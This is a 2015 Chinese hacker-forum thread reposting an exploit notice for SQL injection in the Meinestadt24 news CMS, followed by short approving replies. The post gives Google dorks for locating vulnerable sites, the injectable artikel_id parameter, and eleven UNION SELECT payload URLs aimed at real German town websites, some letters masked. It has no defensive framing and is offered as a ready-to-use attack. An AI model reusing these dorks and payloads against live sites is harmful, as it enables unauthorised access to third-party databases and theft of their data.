社区首页 › 漏洞情报 › Meinestadt24注入漏洞

90_ 发表于 2015-7-27 11:43:42

Meinestadt24注入漏洞

[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
 
Exploit Title : Meinestadt24 SQL Injection Vulnerability
 
Exploit Author : Ashiyane Digital Security Team
 
Google Dork One : intext:© 2015 meinestadt24
Google Dork Two : inurl:nachrichten.php?artikel_id=
 
Date : 2015-7-25
 
Tested On : Windows Se7en
 
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
 
Path Of Vulnerability :
 
http://Target.de/nachrichten.php?artikel_id=-AnyNumber
 
* Reminder : Your Sqli Command Needs UrlEncode
 
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Demos :
 
http://www.meiXgriesheim.de/nachrichten.php?artikel_id=-983722 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meiXeckarsulm.de/nachrichten.php?artikel_id=-990952 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meinXnsberg.de/nachrichten.php?artikel_id=-293312 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXberbach.de/nachrichten.php?artikel_id=-991321 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXschaffenburg.de/nachrichten.php?artikel_id=-74847 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXarmstadt.de/nachrichten.php?artikel_id=-996681 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXabenhausen.de/nachrichten.php?artikel_id=-992823 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXkarlsruhe.de/nachrichten.php?artikel_id=-88747 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.mein-Xchenzell.de/nachrichten.php?artikel_id=-46129 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.mXbebra.de/nachrichten.php?artikel_id=-981361 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.mein-Xrsch.de/nachrichten.php?artikel_id=-987491 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
And many more ...

Sty，涛 发表于 2015-7-27 13:19:12

支持中国红客联盟(ihonker.org)

Sty，涛 发表于 2015-7-28 04:52:04

支持，看起来不错呢！

Lucifer 发表于 2015-7-30 02:33:30

还是不错的哦，顶了

ruguoruo 发表于 2015-7-30 07:59:31

感谢楼主的分享~

ljy07 发表于 2015-7-31 10:20:02

支持，看起来不错呢！

r00tc4 发表于 2015-7-31 16:21:31

wtsqq123 发表于 2015-7-31 17:13:01

支持中国红客联盟(ihonker.org)

Jack-5 发表于 2015-8-1 01:59:45

支持，看起来不错呢！

arctic 发表于 2015-8-1 04:38:03

学习学习技术，加油！

查看完整版本: Meinestadt24注入漏洞